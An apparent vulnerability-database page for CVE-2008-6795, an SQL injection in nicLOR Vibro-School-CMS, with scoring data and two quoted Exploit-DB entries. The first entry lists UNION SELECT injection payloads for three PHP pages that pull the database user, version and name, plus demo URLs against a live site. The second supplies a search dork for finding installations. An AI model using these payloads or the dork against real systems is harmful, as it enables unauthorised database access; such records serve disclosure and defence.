CVE-2008-6795
published 2009-05-07CVE-2008-6795: SQL injection vulnerability in view_news.php in nicLOR Vibro-School-CMS allows remote attackers to execute arbitrary SQL commands via the nID parameter.
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.6th percentile
SQL injection vulnerability in view_news.php in nicLOR Vibro-School-CMS allows remote attackers to execute arbitrary SQL commands via the nID parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Vibro-CMS - Multiple SQL Injections
exploitdb·2008-11-04
CVE-2008-6795 Vibro-CMS - Multiple SQL Injections
Vibro-CMS - Multiple SQL Injections
---
/*
Vibro-CMS Multiple Remote SQL Injection Vulnerabilities
Discovered By StAkeR[at]hotmail[dot]it
http://www.niclor.net/prodotti/Vibro-CMS
* Remote SQL Injection
* Note: Works Regardless PHP.ini Settings
- view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/*
- view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
- view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
* Demo
- http://www.niclor.net/prodotti/Vibro-CMS/view_pagina.php?pId=1 union select 0,concat_ws(0x3a,user(),version(),database()),0/*
- http://www.niclor.net/prodotti/Vibro-CMS/ view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
- http://www.niclor
Exploit-DB
Vibro-School-CMS - 'nID' SQL Injection
exploitdb·2008-11-04
CVE-2008-6795 Vibro-School-CMS - 'nID' SQL Injection
Vibro-School-CMS - 'nID' SQL Injection
---
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!]O O O O O [!]
[!]O O O [!]
[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!]O OOO OOO O O O O OO O O O O OO O O O [!]
[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!]O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO [!]
Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
= Vibro-School CMS (nID) Remote SQL injection Vulnerability =
-= SQL InjEction By : Cyber-Zone =-
-= =-
-= E-mail : [email protected] =-
-= =-
-= Home : WwW.IQ-Ty.CoM =-
Download : http://www.niclor.net/prodotti/Vibro-School-CMS
dork : Vibro-School CMS by nicLOR.net
No writeups or analysis indexed.
2009-05-07
Published